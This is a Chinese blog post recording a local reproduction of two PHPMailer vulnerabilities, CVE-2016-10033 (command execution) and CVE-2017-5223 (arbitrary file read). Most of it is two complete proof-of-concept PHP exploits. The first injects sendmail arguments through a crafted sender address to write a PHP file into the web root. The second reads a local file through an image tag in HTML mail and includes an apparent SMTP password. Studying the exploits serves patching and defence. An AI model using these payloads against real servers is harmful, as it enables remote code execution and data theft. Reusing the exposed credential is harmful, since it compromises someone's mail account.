PHPMailer命令執行及任意文件讀取漏洞
阿新 • • 發佈:2018-02-11
custom orm cga -s tails 文件 ack exp else
今天在thinkphp官網閑逛,無意下載了一套eduaskcms,查看了一下libs目錄中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜這套CMS只提供了一個郵箱接口,前臺頁面需要單獨自己寫,沒辦法用這套CMS進行復現,這邊也順便利用這個PHPMailer-5.2.13對CVE-2016-10033和CVE-2017-5223進行本地復現,記錄一下。
PHPMailer 命令執行漏洞(CVE-2016-10033)
漏洞編號:CVE-2016-10033
影響版本:PHPMailer< 5.2.18
漏洞級別: 高危
漏洞POC:
<?php /* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fattacker\] Arg no. 4 == [-oQ/tmp/] Arg no. 5 == [-X/var/www/cache/phpcode.php] Arg no. 6 == [some"@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. The resulting file will contain the payload passed in the body of the msg: 09607 <<< --b1_cb4566aa51be9f090d9419163e492306 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< 09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- See the full advisory URL for details.*/ // Attacker‘s input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form $email_from = ‘"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com‘; $msg_body = "<?php phpinfo(); ?>"; // ------------------ // mail() param injection via the vulnerability in PHPMailer require_once(‘class.phpmailer.php‘);$mail = new PHPMailer(); // defaults to using php "mail()" $mail->SetFrom($email_from, ‘Client Name‘); $address = "[email protected]"; $mail->AddAddress($address, "Some User"); $mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; $mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!\n"; }
PHPMailer任意文件讀取漏洞分析(CVE-2017-5223)
漏洞編號: CVE-2017-5223
影響版本: PHPMailer <= 5.2.21
漏洞級別: 高危
漏洞POC:根據作者的POC改了幾行,使其適用於qq郵箱
<?php #Author:Yxlink require_once(‘PHPMailerAutoload.php‘); $mail = new PHPMailer(); $mail->isSMTP(); $mail->Host = ‘smtp.qq.com‘; $mail->Port = 465; $mail->SMTPAuth = true; $mail->Username = [email protected]‘; $mail->Password = ‘zsuhxbmsaioxbcgaq‘; $mail->SMTPSecure = ‘ssl‘; $mail->CharSet = "UTF-8"; $mail->Encoding = "base64"; $mail->Subject = "hello"; $mail->From = "[email protected]"; $mail->FromName = "test"; $address = "[email protected]"; $mail->AddAddress($address, "test"); $mail->AddAttachment(‘test.txt‘,‘test.txt‘); $mail->IsHTML(true); $msg="<img src=‘D:\\1.txt‘>test"; $mail->msgHTML($msg); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!"; } ?>
參考文章:
PHPMailer任意文件讀取漏洞分析(CVE-2017-5223)http://www.freebuf.com/vuls/124820.html
PHPMailer 命令執行漏洞(CVE-2016-10033)分析 http://blog.csdn.net/wyvbboy/article/details/53969278
PHPMailer命令執行及任意文件讀取漏洞